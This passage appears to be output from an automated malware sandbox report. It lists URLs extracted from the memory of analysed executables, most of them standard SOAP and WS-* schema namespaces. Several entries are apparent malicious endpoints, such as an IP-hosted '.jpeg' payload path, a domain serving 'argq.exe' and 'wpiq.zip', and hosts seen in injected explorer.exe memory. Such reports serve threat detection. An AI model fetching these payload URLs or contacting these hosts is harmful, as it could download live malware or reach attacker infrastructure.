                      Source: rovwer.exe, 0000000F.00000002.558304896.0000000000B71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://2w3.56.146.174/g84kvj4jck/index.php
                      Source: 453D.exe, 0000000E.00000002.559563601.00000000007F4000.00000040.00000800.00020000.00000000.sdmpString found in binary or memory: http://2w3ke1f81kujb1ErHJ396kFeJh2wGw.kGPoaj9K4sgjD4aiTghsRtuXhqvbvjv8V7st4eO9BqNG3yXvEhExEI86ToM3BF
                      Source: 816F.exe, 0000001A.00000002.572240339.000000000255C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.213.50.70
                      Source: 816F.exe, 0000001A.00000002.564423436.0000000002508000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.213.50.70/Wavafursq.jpeg
                      Source: 816F.exe, 0000001A.00000002.541785354.0000000000889000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.213.50.70/Wavafursq.jpeg&BKl:
                      Source: 816F.exe, 0000001A.00000002.574232042.000000000256A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.213.50.704
                      Source: vbc.exe, 00000021.00000002.523011791.0000000000998000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.://svedbergbryanthusnonarithmetical.com/v6/down/argq.exe
                      Source: 86EE.exe, 0000002D.00000003.491441169.000000000152B000.00000004.00000020.00020000.00000000.sdmp, 86EE.exe, 0000002D.00000003.476668065.000000000152B000.00000004.00000020.00020000.00000000.sdmp, 86EE.exe, 0000002D.00000003.485828261.000000000152B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
                      Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
                      Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
                      Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
                      Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                      Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
                      Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
                      Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
                      Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
                      Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
                      Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
                      Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
                      Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
                      Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
                      Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
                      Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
                      Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
                      Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
                      Source: 816F.exe, 0000001A.00000002.592418657.0000000007352000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.com
                      Source: 86EE.exe, 0000002D.00000003.493388145.0000000001521000.00000004.00000020.00020000.00000000.sdmp, 86EE.exe, 0000002D.00000003.487579395.0000000001520000.00000004.00000020.00020000.00000000.sdmp, 86EE.exe, 0000002D.00000003.492244147.0000000001520000.00000004.00000020.00020000.00000000.sdmp, 86EE.exe, 0000002D.00000003.488488478.0000000001521000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://o36fafs3sn6xou./1148
                      Source: explorer.exe, 00000023.00000000.445464817.0000000003270000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000028.00000000.448635710.0000000000950000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000028.00000002.522890770.0000000000D20000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000000.451638661.00000000005A0000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 0000002C.00000002.523503696.0000000000810000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002C.00000000.454736835.00000000003E0000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://o36fafs3sn6xou.com/
                      Source: explorer.exe, 00000023.00000000.445464817.0000000003270000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000028.00000000.448635710.0000000000950000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000028.00000002.522890770.0000000000D20000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000000.451638661.00000000005A0000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 0000002C.00000002.523503696.0000000000810000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002C.00000000.454736835.00000000003E0000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://o36fafs3sn6xou.com/Mozilla/5.0
                      Source: 453D.exe.1.drString found in binary or memory: http://s.symcb.com/universal-root.crl0
                      Source: 453D.exe.1.drString found in binary or memory: http://s.symcd.com06
                      Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
                      Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
                      Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                      Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                      Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
                      Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
                      Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
                      Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
                      Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
                      Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
                      Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
                      Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
                      Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
                      Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
                      Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
                      Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
                      Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
                      Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
                      Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
                      Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
                      Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                      Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
                      Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                      Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
                      Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
                      Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
                      Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
                      Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
                      Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
                      Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
                      Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
                      Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
                      Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
                      Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
                      Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
                      Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
                      Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
                      Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
                      Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
                      Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
                      Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
                      Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
                      Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
                      Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
                      Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
                      Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
                      Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
                      Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
                      Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm8D;
                      Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
                      Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
                      Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
                      Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
                      Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                      Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
                      Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
                      Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
                      Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
                      Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
                      Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
                      Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                      Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
                      Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
                      Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
                      Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                      Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
                      Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
                      Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
                      Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
                      Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
                      Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
                      Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
                      Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
                      Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp, 816F.exe, 0000001A.00000002.572240339.000000000255C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
                      Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
                      Source: vbc.exe, 00000021.00000002.540979642.0000000007542000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://svedbergbryanthusnonarithmetical.com/
                      Source: vbc.exe, 00000021.00000002.540979642.0000000007542000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://svedbergbryanthusnonarithmetical.com/_z
                      Source: vbc.exe, 00000021.00000002.523011791.0000000000998000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://svedbergbryanthusnonarithmetical.com/v6/down/argq.exe
                      Source: vbc.exe, 00000021.00000002.523011791.0000000000998000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://svedbergbryanthusnonarithmetical.com/v6/down/argq.exeCCJ
                      Source: vbc.exe, 00000021.00000002.523011791.0000000000998000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://svedbergbryanthusnonarithmetical.com/v6/down/argq.exeRC%
                      Source: vbc.exe, 00000021.00000002.531130327.00000000009E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://svedbergbryanthusnonarithmetical.com/v6/down/wpiq.zip
                      Source: vbc.exe, 00000021.00000002.523011791.0000000000998000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://svedbergbryanthusnonarithmetical.com/v6/down/wpiq.zipQQC:
                      Source: vbc.exe, 00000021.00000002.540979642.0000000007542000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000021.00000002.523011791.0000000000998000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://svedbergbryanthusnonarithmetical.com/v6/yoae.php?dfkt=6
                      Source: vbc.exe, 00000021.00000002.523011791.0000000000998000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://svedbergbryanthusnonarithmetical.com/v6/yoae.php?dfkt=60C
                      Source: vbc.exe, 00000021.00000002.523011791.0000000000998000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://svedbergbryanthusnonarithmetical.com/v6/yoae.php?dfkt=6K
                      Source: vbc.exe, 00000021.00000002.531130327.00000000009E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://svedbergbryanthusnonarithmetical.com/v6/yoae.php?dfkt=6h
                      Source: vbc.exe, 00000021.00000002.540979642.0000000007542000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://svedbergbryanthusnonarithmetical.com/z/
                      Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
                      Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1
                      Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10
                      Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.597552021.0000000002B50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10Response
                      Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11
                      Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.595445295.0000000002AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11Response
                      Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12
                      Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12Response
                      Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13
                      Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13Response
                      Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14
                      Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14Response
                      Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15
                      Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15Response
                      Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16
                      Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16Response
